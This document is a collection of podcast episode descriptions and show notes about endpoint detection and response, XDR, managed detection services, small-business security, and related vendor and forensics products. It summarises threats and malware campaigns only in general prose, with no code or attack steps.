Securing Small Businesses: Essential Cybersecurity Tools and Strategies In this episode of CISO Tradecraft, host G Mark Hardy discusses cybersecurity challenges specific to small businesses. He provides insights into key tools and strategies needed for effective cybersecurity management in small enterprises, including endpoint management, patch management, EDR tools, secure web gateways, IAM solutions, email security gateways, MDR services, and password managers. Hardy also evaluates these tools against the CIS Critical Security Controls to highlight their significance in safeguarding small business operations. Transcripts: https://docs.google.com/document/d/1Hon3h950myI7A3jzGmj7YIwRXow5W1V5 Chapters 00:00 Introduction to CISO Tradecraft 00:40 Challenges of Cybersecurity in Small Businesses 01:15 Defining Small Business and Security Baselines 01:53 Top Cybersecurity Tools for Small Businesses 02:05 Hardware and Software Essentials 04:35 Patch Management Solutions 05:19 Endpoint Detection and Response (EDR) Tools 06:06 Secure Web Gateways and Website Security 11:21 Identity and Access Management (IAM) 12:57 Email Security Gateways 14:15 Managed Detection and Response (MDR) Solutions 14:54 Recap of Essential Cybersecurity Tools 15:41 Bonus Tool: Password Managers 18:33 Aligning with CIS Controls 24:48 Conclusion and Call to Action
Rick Howard, The CSO, Chief Analyst, and Senior Fellow at N2K Cyber, discusses the current state of “eXtended Detection and Response” (XDR) with CyberWire Hash Table guests Rick Doten, Centene's VP of Security, and Milad Aslaner, Sentinel One's XDR Product Manager. References: Alexandra Aguiar, 2023. Key Trends from the 2023 Hype Cycle for Security Operations [Gartner Hype Cycle Chart]. Noetic Cyber. Daniel Suarez, 2006. Daemon [Book]. Goodreads. Dave Crocker, 2020. Who Invented Email, Email History, How Email Was Invented [Website]. LivingInternet. Eric Hutchins, Michael Cloppert, Rohan Amin, 2010. Intelligence-Driven Computer Network Defense Informed by Analysis of Adversary Campaigns and Intrusion Kill Chains [Paper]. Lockheed Martin Corporation. Jon Ramsey, Mark Ryland, 2022. AWS co-announces release of the Open Cybersecurity Schema Framework (OCSF) project [Press Release]. Amazon Web Services. Nir Zuk, 2018. Palo Alto Networks Ignite USA '18 Keynote [Presentation]. YouTube. Raffael Marty, 2021. A Log Management History Lesson – From syslogd(8) to XDR [YouTube Video]. YouTube. Raffael Marty, 2021. A history lesson on security logging, from syslogd to XDR [Essay]. VentureBeat. Rick Howard, 2020. Daemon [Podcast]. Word Notes. Rick Howard, 2021. XDR: from the Rick the Toolman Series [Podcast and Essay]. CSO Perspectives, The CyberWire. Rick Howard, 2023. Cybersecurity First Principles: A Reboot of Strategy and Tactics [Book]. Goodreads. Staff, n.d. Open Cybersecurity Schema Framework [Standard]. GitHub. Staff, 2019. What is EDR? Endpoint Detection & Response Defined [Explainer]. CrowdStrike. Staff, 2020. Log Formats – a (Mostly) Complete Guide [Explainer]. Graylog. Stephen Watts, 2023. Common Event Format (CEF): An Introduction [Explainer]. Splunk. Thomas Lintemuth, Peter Firstbrook, Ayelet Heyman, Craig Lawson, Jeremy D'Hoinne, 2023. Market Guide for Extended Detection and Response [Essay]. Gartner.
Jérôme Segura, Senior Director of Threat Intelligence at Malwarebytes, is discussing their work on "Threat actors ride the hype for newly released Arc browser." The Arc browser, newly released for Windows, has quickly garnered positive reviews but has also attracted cybercriminals who are using deceptive Google search ads to distribute malware disguised as the browser. These malicious campaigns exploit the hype around Arc, using techniques like embedding malware in image files and utilizing the MEGA cloud platform for command and control, highlighting the need for caution with sponsored search results and the effectiveness of Endpoint Detection and Response (EDR) systems. The research can be found here: Threat actors ride the hype for newly released Arc browser
Host Karl Palachuk interviews Wes Hutcherson and Stuart Ashenbrenner from Huntress on the challenges (and victories) of securing macOS endpoints. As you know, macOS represents a growing percentage of the business device operating system market, outperforming both Linux and ChromeOS. Since this is going to be a growing portion of the endpoints you support, it's good to know how you're going to do that. And with so many "home" and personal devices now being used for company purposes, quick response is important as well. The panel addresses the challenges of macOS users, including their persistent reluctance to believe that their devices need protection at all! There is a false sense of security around macOS, driven by old-school understandings of Mac security and the realities of well-funded adversaries on the dark web. macOS malware now accounts for 6.2% of all endpoint OS malware. Half of all macOS users have been affected by malware, hacking, or scams. You can expect that to grow as well. ----- Thanks to Huntress for sponsoring the SMB Community Podcast. Partners can learn more at https://www.huntress.com/karl Wes Hutcherson is the Director of Product Marketing for Huntress, where he oversees market intelligence and go-to-market strategies. His multi-faceted technology and cyber security experience spans over a decade with market leaders such as Bishop Fox, eSentire, Hewlett-Packard, and Dell SecureWorks, covering Managed Detection and Response, Governance, Risk, and Compliance, Continuous Threat Exposure Management, Offensive Security, and other topics. Stuart Ashenbrenner works at Huntress as a Staff macOS Researcher, focusing on macOS security and development. He has spoken at various conferences about macOS security, including Objective by the Sea. He is co-author and core developer on the open source macOS incident response tool called Aftermath. He has previously worked as a macOS detections engineer and a software engineer.
:-) — Our upcoming events and more: Register for James's class at ITSPU! 5W22 – MSP Professional Sales is live. Enroll today: https://www.itspu.com/all-classes/classes/msp-professional-sales-program/ MASTERMIND LIVE – Tampa, FL – June 27-28th http://bit.ly/kernanmastermind Use “EARLYBIRD” as the coupon code to save $200! Check out Amy's weekly newsletter! Sign up now: https://mailchi.mp/thirdtier/small-business-tech-news Kernan Consulting “Weekly Tips”! Sign up now: https://kernanconsulting.com/ Our Social Links: https://www.linkedin.com/in/james-kernan-varcoach/ https://www.facebook.com/james.kernan https://www.facebook.com/karlpalachuk/ https://www.linkedin.com/in/karlpalachuk/ https://www.linkedin.com/in/amybabinchak/ https://www.facebook.com/amy.babinchak/ https://thirdtier.net https://www.youtube.com/@ThirdTierIT --- Sponsor Memo: Huntress Today's SMB Community Podcast is brought to you by Huntress Managed Security. Cybersecurity is more than software—it's also the expertise needed to effectively fight against today's evolving threat landscape. Huntress Managed Security is custom-built to provide human expertise and save your clients from cyber threats. Huntress' suite of fully managed cybersecurity solutions is powered by a 24/7, human-led SOC dedicated to around-the-clock monitoring, expert investigation, and rapid response. While you focus on growing your business, we provide first response to hackers. Huntress has the #1 rated EDR for SMBs on G2 and a partner support Satisfaction score average of 99%. To start a trial today, visit https://huntress.com/karl
(5/1/24) - In today's Federal Newscast: The Defense Innovation Unit gets a new deputy director of commercial operations. The GSA's effort to "right size" the inventory of federal office space continues. And CISA makes major progress deploying Endpoint Detection and Response tools on agency systems.
In a world where technology evolves at breakneck speed, so too do the methods by which cybercriminals exploit it for malicious purposes. As we edge closer to the 2024 general election, the digital landscape becomes a minefield of sophisticated cyber threats aimed at voters. To navigate this complex terrain, we've invited Andrew Newman, CTO and co-founder of ReasonLabs, to share his invaluable insights on the cybersecurity challenges looming over this pivotal event. Andrew, a seasoned cybersecurity professional with a wealth of experience and the guiding force behind ReasonLabs—a leading provider of enterprise-grade protection—brings a unique perspective to the table. His insights into emerging trends and digital pitfalls that voters may face are invaluable. Today, he will delve into the sophisticated tactics employed by cyber adversaries, including the use of AI to craft convincing phishing attacks and the creation of deepfakes designed to sow discord and manipulate public perception. The use of generative AI by scammers has significantly lowered the barriers to creating realistic fake content, posing a serious threat to election security. Andrew will break down how these advanced threats work and the implications for voters' privacy and the integrity of electoral processes. He will also stress the crucial role of public education in countering these threats despite the challenges posed by the realistic nature of AI-generated content. ReasonLabs, a pioneer in consumer cybersecurity, is at the forefront of implementing layered protections. These include anti-phishing measures and Endpoint Detection and Response (EDR) systems designed to counter these emerging threats. Through this conversation, Andrew aims to equip listeners with the knowledge and tools they need to protect themselves against the sophisticated scams that are expected to proliferate during the election season. 
Expect to uncover the nature of the cyber threats targeting voters, from the evolution of phishing attacks to the sinister use of deepfakes. Learn to discern between genuine and malicious communications, the importance of verifying information sources, and the best practices for ensuring digital security in an increasingly vulnerable online environment. As we delve into these critical issues, Andrew will also shed light on the expected increase in election-related scams compared to previous years, fueled by advancements in technology that enable scammers to craft more believable and, thus, more dangerous threats. From robocalls and SMiShing to phishing sites and deceptive donation requests, listeners will understand the scams to watch out for and the measures to avoid becoming a victim. This episode is not just about highlighting problems; it's about forging solutions and strategies to bolster our digital defenses against a significant democratic event. Join us as we explore the intersection of technology, security, and democracy with one of the industry's most seasoned experts. How prepared are we to defend the sanctity of our votes in the digital age? Share your thoughts and join the conversation.
In this episode of The Cybersecurity Defenders Podcast, we discuss some cutting-edge intel coming out of LimaCharlie's community Slack channel. AhnLab Security Intelligence Center published an article exploring Nood RAT. Nood RAT is a variant of Gh0st RAT that works in Linux. GTPDOOR is the name of Linux-based malware that is intended to be deployed on systems in telco networks adjacent to the GPRS eXchange Network, with the novel feature of communicating C2 traffic over GTP-C control-plane signaling messages. Researchers are reporting on Pikabot's evasion techniques against Endpoint Detection and Response systems: it employs an advanced technique to hide its malicious activities known as “indirect system calls”. Unit 42 at Palo Alto Networks is reporting on a new Linux variant of Bifrost that showcases an innovative technique to evade detection. President Biden issued an Executive Order to protect Americans' sensitive personal data from exploitation by countries of concern.
Mark Taylor, the CTO and co-founder of Chorus, a 24-year-old traditional MSP with a strong Microsoft focus, provided a wealth of knowledge on this subject. He explained that Chorus has three core streams: traditional managed services, a Microsoft-focused Dynamics practice, and a security web practice that has been operating for about five years. The discussion started with a focus on the evolving threat landscape over the past 18 months. Mark emphasized that security breaches can often be triggered by the simplest mistakes, such as leaving a back door open. MSPs are increasingly targeted by cybercriminals, making security a paramount concern for both MSPs and their clients. Mark highlighted that, historically, businesses viewed security as locking the gates and fortifying their defenses. However, this approach is outdated. Even if you build strong walls, determined attackers will find a way in. Instead, the new perspective is to assume that they will get in eventually and focus on quickly detecting and responding to threats. This resilience-driven mindset is essential for protecting both MSPs and their clients. When it comes to starting the journey into managed security services, Mark stressed the importance of implementing basic security hygiene effectively. Properly implemented Multi-Factor Authentication (MFA) is a key component in reducing risks, with studies showing that 98% of risks can be mitigated through these basic measures. Additionally, Mark highlighted the shift from traditional antivirus solutions to Endpoint Detection and Response (EDR) or Managed XDR (Extended Detection and Response) services, which provide more comprehensive threat detection and response capabilities. Mark clarified that the term MSSP (Managed Security Service Provider) has evolved over time and is now broadly applicable to most MSPs. 
Even if MSPs are not offering full-blown 24/7 security operations centre (SOC) services, they are still engaging with security discussions and implementing essential security measures. It's a matter of varying degrees of specialization and service offerings. The conversation then turned towards Chorus's journey in building its own Cyber Security Operations Center (CSOC). Mark explained that their decision to invest in a CSOC stemmed from the need to provide enhanced security services to their larger clients. They recognized the need for faster threat detection and containment, which is achievable with a dedicated CSOC. Ian inquired about the different security layers within MSPs, including the help desk, the Network Operations Center (NOC), and the Security Operations Center (SOC). Mark clarified that the SOC primarily focuses on monitoring and responding to security threats, ensuring rapid detection and containment. While some MSPs choose to handle security alerts within their organization, others outsource these functions to specialized providers. They also discussed the differences between Managed Detection and Response (MDR) and Managed Extended Detection and Response (MXDR). MDR initially focuses on protecting endpoints, whereas MXDR extends its scope to cover additional security measures, such as monitoring sign-in logs on domain controllers and analysing email traffic in greater detail. The choice between MDR and MXDR depends on the MSP's and clients' specific needs and risk profiles. The conversation touched on the adoption of Microsoft's security solutions, with Mark highlighting the attractiveness of Microsoft 365 Business Premium, which includes Defender for Endpoint. Many clients already have these licenses and may opt to leverage Microsoft's security offerings, reducing the need for third-party solutions. Finally, they delved into the role of Artificial Intelligence (AI) in shaping the future of cybersecurity. 
AI is rapidly becoming an integral part of security operations, providing quicker insights and decision-making capabilities. While AI enhances security measures, it is not a replacement for human expertise but rather a tool that supports and enhances the capabilities of security professionals. In conclusion, this episode with Mark Taylor shed light on the evolving landscape of managed security services and the crucial role they play in safeguarding MSPs and their clients. As the threat landscape continues to evolve, it is essential for MSPs to consider adopting managed security services and choose the right security measures to protect their clients effectively. Connect with Mark Taylor on his LinkedIn by clicking HERE Or you can also check out Chorus through their website by clicking HERE Connect with me on LinkedIn and see what I'm up to by clicking HERE To join our amazing Facebook Group of over 300 MSPs where we are helping you Scale Up with Confidence, then click HERE Until next time, look after yourself and I'll catch up with you soon!
In this episode of the Identity at the Center (IDAC) podcast, hosts Jim McDonald and Jeff Steadman have an in-depth discussion about cyber insurance with guest Jason Rebholz, Chief Information Security Officer at Corvus Insurance. Jason also hosts the popular Teach Me Cyber YouTube channel and shares his journey into security content creation. Topics covered around cyber insurance include an overview of what it is, what protections it offers, what type of companies need it, as well as best practices for completing applications. They discuss key security controls that insurance carriers look for, with a focus on Multi-Factor Authentication (MFA), Endpoint Detection and Response (EDR), and resilient backups. Jason offers perspective into the evolving role of insurance providers, not just in paying claims, but in coordinating incident response and providing value-added services to policyholders. This includes recommending and connecting customers to vetted vendors, reviewing response costs, and helping plan remediation efforts. Other discussion areas include common mistakes applicants make on cyber insurance questionnaires and how to provide proper context to underwriters. The group also talks through emerging technologies like Privileged Access Management (PAM) and AI that enterprises should be aware of. On the lighter side, Jason shares his passion for indoor rock climbing and how the sport connects to his work in security with skills like problem solving, mental mapping, and dealing with constant change.
Connect with Jason: https://www.linkedin.com/in/jrebholz/ Teach Me Cyber on YouTube: https://www.youtube.com/@teachmecyber Weekend Byte Newsletter: weekendbyte.teachmecyber.com Learn more about Corvus Insurance: https://www.corvusinsurance.com/ Identiverse Regional Event - Chicago: https://bit.ly/IDVR23-IDAC Connect with us on LinkedIn: Jim McDonald: https://www.linkedin.com/in/jimmcdonaldpmp/ Jeff Steadman: https://www.linkedin.com/in/jeffsteadman/ Visit the show on the web at idacpodcast.com and follow @IDACPodcast on Twitter.
In our second installment for Cybersecurity Month we will be diving into EDR: Endpoint Detection and Response. As always, have fun, and hopefully learn a thing or two in the process. Make sure to follow us so you don't miss the new videos we have coming out, and share this video with someone you think would enjoy or learn something from it. Visit Shortarm's website: https://www.shortarmsolutions.com/ You can follow us at: LinkedIn: https://www.linkedin.com/company/shortarmsolutions YouTube: https://www.youtube.com/@shortarmsolutions Twitter: https://twitter.com/ShortArmSAS
There are a host of cyber activities and initiatives underway in the federal government right now, and what better way to mark Cybersecurity Awareness Month than by having Mitch Herckis, Branch Director for Federal Cybersecurity at the Office of Management and Budget, on to detail them all for us. Mitch also has an encyclopedic memory of E.O. and M-memo numbers, which warms our hearts at GovNavigators.
Resources:
E.O. 14028: Improving the Nation's Cybersecurity
M-22-09: Federal Zero Trust Strategy
M-23-22: Delivering a Digital-First Public Experience
M-22-01: Improving Detection of Cybersecurity Vulnerabilities and Incidents on Federal Government Systems through Endpoint Detection and Response
M-22-18: Enhancing the Security of the Software Supply Chain through Secure Software Development Practices
Title: Episode 54 - XDR Deep Dive with Matt Robertson and Aaron Woland. Hosts Bryan and Tom return with a fascinating exploration of Extended Detection and Response (XDR) in this latest episode of Conf T with your SE. We kick things off with a fundamental question: what is XDR? Our guests, security experts Matt Robertson and Aaron Woland, provide an insightful overview and outline the pressing need for XDR in today's security landscape. The discussion then turns to the key differences between XDR and SecureX, another well-known security platform. Our hosts dig into the integration of tools like Cisco Threat Response and the orchestration built into SecureX, illuminating how XDR ups the ante by bringing detection into the tool itself instead of merely relying on individual security products. Robertson and Woland emphasize the importance of an open XDR platform, one that seamlessly integrates with other vendors outside of Cisco. They detail the significant role of built-in analytics in bolstering security efficacy. Addressing the limitations of Endpoint Detection and Response (EDR), the experts cite the fact that EDR can only reach about 30% of a company's assets and explain why XDR's broader scope is critical in the current context. We then delve into comparisons with Security Information and Event Management (SIEM) systems. Are they the same as XDR? Or, perhaps more pertinently, is a SIEM system enough? Lastly, the conversation steers towards the operational aspects of XDR, specifically how it can confirm, prioritize, and walk through an incident, an essential aspect of any robust cybersecurity framework. Tune in to this gripping episode to deepen your understanding of XDR and why it's vital in today's digital landscape.
In this episode, we take a deep dive into Endpoint Detection and Response (EDR) and explore how it can save your business from potential cyber threats. We discuss the benefits of EDR, implementation best practices, and factors to consider when selecting an EDR solution. Don't miss this crucial episode for businesses looking to enhance their cybersecurity strategy. Previous EDR Podcast: https://rss.com/podcasts/cit-techforbusiness/857284/ Have a question or topic suggestion? Email us at info@cit-net.com or head over to www.cit-net.com/podcast Never miss an episode! Sign up for our newsletter: https://www.cit-net.com/podcast/
Kaspersky leads the TOP3 cybersecurity tests in 2022, once again demonstrating its superior performance in independent evaluations throughout the year. With 69 first places and 73 TOP3 positions in 86 tests and reviews, Kaspersky's products outperformed the competition in key metrics, including anti-malware protection for the home and corporate solutions such as Endpoint Detection and Response Expert.
Grayshift wants to allow customers to remove limitations such as inadequate computers and the need to use expensive external units. VeraKey has delivered the ability for investigators to share evidence regardless of geographic boundaries. VeraKey is Grayshift's solution for commercial customers who want a GrayKey device, the collection tool used by law enforcement. Unlike GrayKey, VeraKey is a consent-based mobile forensic solution. It performs the same function of full file system collection from a device and provides that data for forensic analysis.
[01:50] Profile of this episode's guest: Brian Fitch, Senior Product Manager, Grayshift. Brian was instrumental in the development and release of VeraKey. He has been the Product Manager for a variety of companies. Twenty-five years ago, he started his cybersecurity career in customer support and transitioned into sales and systems engineering.
[08:11] Endpoint Detection and Response (EDR) and Managed Detection and Response (MDR). EDR is what antivirus and anti-malware have morphed into today. It protects endpoints against the latest threats and gives customers information about what is happening at those endpoints. Sometimes something new can get into the system that isn't detected by anti-malware or antivirus; EDR reports against that. MDR ingests the alerts of EDR and sends them through software engineering and artificial intelligence to extract actionable security alerts for customers.
[13:31] Brian's journey to Grayshift. Brian had heard of the company and the positive outcomes it helped deliver, so he had been interested in joining Grayshift for a while. More and more people he knew and had good working relationships with had joined Grayshift. When a product management position opened, he pursued it and started with Grayshift last summer.
[17:38] What is VeraKey? VeraKey is a consent-based mobile forensics solution offering plug-and-play functionality to perform a full file system collection while offering simultaneous data analysis when coupled with Grayshift's new ArtifactIQ. A significant benefit is the ease with which collections can be shared, even with geographical separation in an investigation. The best feature is the ease of use. Following the workflow, the full file system is extracted. The user can opt to upload to ArtifactIQ and reach their first fact faster while performing analysis. The main difference between VeraKey and GrayKey is that VeraKey is a consent-based device only. It cannot unlock or brute force a phone like GrayKey. The companies using VeraKey have the consent of the device custodian and are usually performing a corporate investigation.
[20:24] ArtifactIQ and how it works with VeraKey. ArtifactIQ is a cloud-based analytics tool. When VeraKey starts collecting data, it gives you the option to send that collected data to ArtifactIQ simultaneously. Once in the cloud, ArtifactIQ pulls the most important data forward and puts it in an easy-to-read format inside the same user interface. Investigators can then review data easily and quickly.
[24:59] Research from the private sector. Grayshift spoke with many digital forensic examiners in the private sector while conducting research for the creation of VeraKey. Companies were adamant about protecting their employees from outside threats such as litigation over a perceived malpractice event. Commercial customers benefit from having consent for the collection, usually because the device is corporate-owned or covered by a Bring Your Own Device agreement.
[33:40] Prioritizing the roadmap for innovations. Prioritization is one of the most fun and frustrating parts of being a product manager. Many organizations follow a framework such as Weighted Shortest Job First (WSJF) or Reach Impact Confidence Effort (RICE) to prioritize which problems to solve first. There's no right or wrong method for prioritization. Organizations need to determine what approach would work best for them. Brian primarily focuses on ensuring the company addresses the right problems first.
CONNECT WITH DEBBIE, KARIN, AND GRAYSHIFT: Debbie on Twitter, Debbie on LinkedIn, Karin on LinkedIn. Check out Grayshift online: https://Grayshift.com Grayshift on Facebook, Grayshift on Instagram, Grayshift on Twitter, Grayshift on LinkedIn. Connect with us about the podcast at podcast@grayshift.com
In this episode, we'll be focusing on Endpoint Detection and Response (EDR), a critical technology for detecting and responding to threats that target endpoints such as laptops, desktops, and servers. Our in-house guests will provide an overview of EDR and explain why it's important for businesses of all sizes. They'll define EDR and explore the different components that make up an EDR system, including the differences between EDR and traditional antivirus software. The podcast will also discuss how EDR works and explore the various methods of threat detection, including signature-based, behavior-based, and machine learning-based techniques. The use cases for EDR, including advanced persistent threat (APT) detection, incident response, and forensic analysis, will also be highlighted. In addition, we'll explore the benefits of using EDR in various industries such as healthcare, finance, and government. Finally, our experts will provide tips and best practices for implementing and using EDR effectively, including the importance of regular software updates and threat intelligence sharing. If you're concerned about cybersecurity threats to your organization and want to learn everything you need to know about EDR, then tune in to this informative episode of our podcast.
EDR! Today, in an episode of escalating intensity, we will answer all the questions about this fantastic security tool. This time the episode will be accessible to everyone, regardless of their level of security knowledge. But as we know, nothing is perfect, so in true Cybersecurity Podcast style we will also find out how one of the many checks performed on live processes can be evaded! Follow me on Spotify, iTunes, LinkedIn and Instagram "@nick.soc" to stay up to date on new releases!
In this episode of The Power Producers Podcast, David Carothers interviews Chris Steffl and Daniel Metcalf of CyberFin. Chris and Daniel discuss everything they're doing to make waves in the commercial insurance industry for producers and agencies who want to become better at using cyber to establish relationships and educate their clients on cyber liability. Episode Highlights: Chris explains that he is a second-generation insurance professional who has worked for an insurance wholesale company for 20 years. (3:03) Daniel mentions that he has spent the past 15 years addressing business challenges for technology, and he has assisted in the development of a service on how to ensure that banks and credit unions comply with rules. (3:50) Daniel explains how they have assisted MSPs and commercial insurance companies. (7:22) Daniel explains spoofed authentication, when a cybercriminal impersonates you or your organization to obtain multi-factor authentication credentials. (13:21) Daniel discusses Endpoint Detection and Response (EDR), which looks for ransomware code or malware code on your computer that may be disguised. (23:28) Daniel explains that cybercriminals are targeting small and medium-sized enterprises because they have realized that they are an easier, more profitable target. (30:23) Chris explains that each industry has different risks, yet they are all comparable across industries. (37:21) Chris explains that for the past six months, they have been working on developing a program that would allow agencies and agents to bring their customers in to be educated about cyber liability. (39:31) David discusses why cyber liability is getting more popular these days. (42:31)
Tweetable Quotes: "EDR is Endpoint, Detection and Response… What EDR does is it looks for ransomware code, malware code actively working on your computer because it can be masked as something that's supposed to be there." - Daniel Metcalf "Multilayer protection is so important and that's the thing we're really trying to get out there on time, because right now, one line of defense can be gotten through, possibly, you've got to have multiple lines of defense to basically stop this." - Chris Steffl "One thing we've put in place over the last six months here, is really trying to offer a program that as an agency or an agent to be able to bring their customers in so they can become educated." - Chris Steffl
Resources Mentioned: Chris Steffl LinkedIn, Daniel Metcalf LinkedIn, CyberFin, David Carothers, Kyle Houck, Florida Risk Partners, The Extra 2 Minutes
Martin talks about the importance of security for the Atomized Network -- providing enterprises with full visibility and control across their entire network infrastructure. He elaborates on the atomized network. He also talks about how we are trying to weave together different cloud networks. He stresses the need to have one place to bring all the individual pieces and technologies together. He talks about writing and building next-generation firewalls, appliance-based DPIs, and intrusion prevention systems. Netography is built on the idea of having visibility and control. "How can security teams adapt to today's changing, widely dispersed Atomized Network? Maintain visibility and control where Endpoint Detection and Response (EDR) and other traditional solutions simply cannot see independently. Help organizations obtain context for their data to visualize and analyze their network by application, location, compliance groups or any other scheme." Connect with Martin: https://www.linkedin.com/in/maroesch/ Visit Netography: https://netography.com/ Visit Short Arm's website: https://www.shortarmsolutions.com/ You can follow us at: LinkedIn: https://www.linkedin.com/company/shortarmsolutions YouTube: https://www.youtube.com/@shortarmsolutions Twitter: https://twitter.com/ShortArmSAS
A cyberattack is not the same thing as malware—in fact, malware itself is typically the last stage of an attack, the punctuation mark that closes out months of work from cybercriminals who have infiltrated a company, learned about its systems and controls, and slowly spread across its network through various tools, some of which are installed on a device entirely by default. The goal of cybersecurity, though, isn't to recover after an attack; it's to stop an attack before it happens. On today's episode of Lock and Code, with host David Ruiz, we speak to two experts at Malwarebytes about how they've personally discovered and stopped attacks in the past and why many small- and medium-sized businesses should rely on a newer service called Managed Detection and Response for protecting their own systems. Many organizations today will already be familiar with the tool called Endpoint Detection and Response (EDR), the de facto cybersecurity tool that nearly every vendor makes, which lets security teams watch over their many endpoints and respond if the software detects a problem. But the mass availability of EDR does not mean that cybersecurity itself is always within arm's reach. Countless organizations today are so overwhelmed with day-to-day IT issues that monitoring cybersecurity can be difficult. The expertise can be lacking at a small company. The knowledge of how to configure an EDR tool to flag the right types of warning signs can be missing. And the time to adequately monitor an EDR tool can be in short supply. This is where Managed Detection and Response—MDR—comes in. More a service than a specific tool, MDR is a way for companies to rely on a team of experienced analysts to find and protect against cyberattacks before they happen. The power behind MDR services is its threat hunters, people who have prevented ransomware from being triggered, who have investigated attackers' moves across a network, who have pulled the brakes on a botnet infection.
These threat hunters can pore over log files and uncover, for instance, a brute force attack against a remote desktop protocol port, or they can recognize a pattern of unfamiliar activity coming from a single account that has perhaps been compromised, or they can spot a ransomware attack in real time, before it has launched, even creating a new rule to block an entirely new ransomware variant before it has been spotted in the wild. Most importantly, these threat hunters can do what software cannot, explained Matt Sherman, senior manager of MDR delivery services. They can stop the people behind an attack, not just the malware those people are deploying. "Software stops software, people stop people." Today, we speak with Sherman and MDR lead analyst AnnMarie Nayiga about how they find attacks, what attacks they've stopped in the past, why MDR offers so many benefits to SMBs, and what makes for a good threat hunter. You can also find us on Apple Podcasts, Spotify, and Google Podcasts, plus whatever preferred podcast platform you use. Show notes and credits: Intro Music: "Spellbound" by Kevin MacLeod (incompetech.com) Licensed under Creative Commons: By Attribution 4.0 License http://creativecommons.org/licenses/by/4.0/ Outro Music: "Good God" by Wowa (unminus.com)
Adam Bell and Peter Nikolaidis, The Blurring The Lines Podcast. Intros, Peter as a son-in-law, iPhone 14 new features, SOS, camera size, battery charging, Microsoft Authenticator, photo magic lasso, Dynamic Island, favorite feature of the new phone, EDR, XDR, Endpoint Detection and Response, SIEM is multiple sources, Tabletop Exercises – Dungeons & Dragons […]
Bobby Horn chats with Michael Cowley, Senior Vice President of Cyber Risk and Head of Solution Engineering at Kroll, to provide a deeper understanding of the differences between endpoint detection & response platforms (EDR), managed detection & response platforms (MDR), network detection & response tools (NDR) and security information & event management (SIEM), and the benefits that come with each.
In order to implement a successful security system, it starts with security awareness by the employees. They are the first link of defense and at the same time can be the weakest link. Training is a must to get the entire organization on board with the program. Udo Riedel, CTO and Founder, DriveLock, speaks to Don Witt of The Channel Daily News, a TR publication, about their comprehensive solutions. Udo identifies the goals of DriveLock in the U.S. market and how they plan to strengthen their current position. Listen in as Udo also addresses the differences between the European and the U.S. markets and why DriveLock can help U.S. enterprises significantly in securing their network and data. About: DriveLock is a German company. Founded in 1999, they are now one of the leading international specialists for IT and data security. They have set themselves the goal of reliably protecting corporate data, devices and systems. To achieve this, they rely on the latest technologies, experienced security experts and solutions based on the Zero Trust model. In today's security architecture, zero trust means a paradigm shift according to the maxim "Never trust, always verify". Their DriveLock Zero Trust platform follows this principle. It combines the elements: Data Protection, Endpoint Protection, Endpoint Detection & Response, and Identity & Access Management. The fully integrated zero trust platform supports different operating systems and end devices and is offered as an on-premises solution and as a managed security service. For more information, go to: https://www.drivelock.com/
The previously distinct but now converged fields and product lines of Endpoint Protection (EPP) and Endpoint Detection & Response (EDR) are covered in the brand new KuppingerCole Analysts Leadership Compass on EPDR (Endpoint Protection Detection & Response). Lead Analyst John Tolbert joins Matthias to give a sneak peek into this market segment and shares some results of the evaluation as well.
Michael meets with Matt Burch, the VP of ComportSecure. They talk about some of the services ComportSecure provides, including IT Solutions, Managed Services, and Cloud Services. They also discuss other cybersecurity topics such as BaaS (Backup as a Service), ransomware, and EDR solutions (Endpoint Detection and Response).
In the modern enterprise network, endpoints have grown exponentially and the built-in perimeter we had at the office has disappeared. In this remote, cloud-native world, bad actors have a wider attack surface to exploit. Enter endpoint detection and response (EDR). Shelby Skrhak speaks with Jennifer Lavender, worldwide sales and business development leader for IBM Security at IBM, about: - The difference between EDR and XDR - The acquisition of ReaQta - 3 differentiating components of ReaQta. Email Jilina Damin or visit IBM Security ReaQta for more information. To join the discussion, follow us on Twitter @IngramTechSol #B2BTechTalk Listen to this episode and more like it by subscribing to B2B Tech Talk on Spotify, Apple Podcasts, or Stitcher. Or tune in on our website.
In episode 69 of The Cyber5, we are joined by Lima Charlie's CEO, Maxime Lamothe-Brassard. We discuss the future of what's known in the security industry as XDR, which is essentially an enrichment of endpoint detection and response products. Three Key Takeaways:
1) What is XDR? It depends who you ask. XDR is not another tool, but merely an extension of Endpoint Detection and Response (EDR) products. Gartner expects 50% of mid-market buyers to adopt XDR strategies by 2027. For context, in around 2010, cybersecurity vendors started driving stronger antivirus solutions for endpoint computers and servers, called Endpoint Detection and Response (EDR). Antivirus was only catching malware with a known signature and was not able to detect the malicious lateral movement that is common in today's attacks. Every EDR platform has its own unique set of capabilities. However, some common capabilities include monitoring endpoints in both online and offline mode, responding to threats in real time, increasing visibility and transparency of user data, detecting stored events involving malicious malware injections, and creating blacklists and whitelists in integration with other technologies. Now that EDR solutions are firmly within the market, they need to be integrated with other tools, including threat intelligence, to be effective at scale for the enterprise. These massive integrations needed at scale, especially with the cloud, are what is starting to be defined as XDR.
2) What are the key integrations to EDR products to form an XDR strategy?
a. Identity Access Management: gives visibility into who is accessing what applications and websites in the enterprise.
b. Threat Intelligence: information and artifacts from attacker infrastructure, previous compromises, and behavior that can be identified outside of firewalls.
c. Cloud and SaaS Logging: any application in the cloud produces a log for access and use.
3) XDR does not have to be expensive or manpower-intensive for SMBs.
a. Cloud, SaaS, and Identity Access Management produce logs that can be integrated into easy solutions that do not need to be complex products, particularly for SMBs.
b. Enablement should be the critical aspect of XDR rather than more expensive tooling.
c. Easy, automatable solutions to apply security controls are the critical way forward for medium and large enterprises.
BlueLeaks hack exposes US police data, Endpoint Detection and Response security, and Microsoft Philanthropies' Microsoft Tech for Social Impact (TSI).
Hackers just leaked sensitive files from over 200 police departments that are searchable by badge number.
A new census finds hundreds of open source components that could undermine security.
New industry spec would have CPUs built using components from multiple vendors.
Apple teams up with Google, Mozilla, Microsoft to improve browser interoperability.
Enterprises look beyond VPNs and antivirus software for remote workers with a growing emphasis on endpoint detection and response (EDR).
Microsoft Philanthropies' Erik Arnold talks about what Microsoft Tech for Social Impact (TSI) does for NGOs and non-profit organizations.
Hosts: Louis Maresca and Curt Franklin. Co-Host: Oliver Rist. Guest: Erik Arnold. Download or subscribe to this show at https://twit.tv/shows/this-week-in-enterprise-tech. Get episodes ad-free with Club TWiT at https://twit.tv/clubtwit Sponsors: newrelic.com/enterprise nureva.com plextrac.com/twit
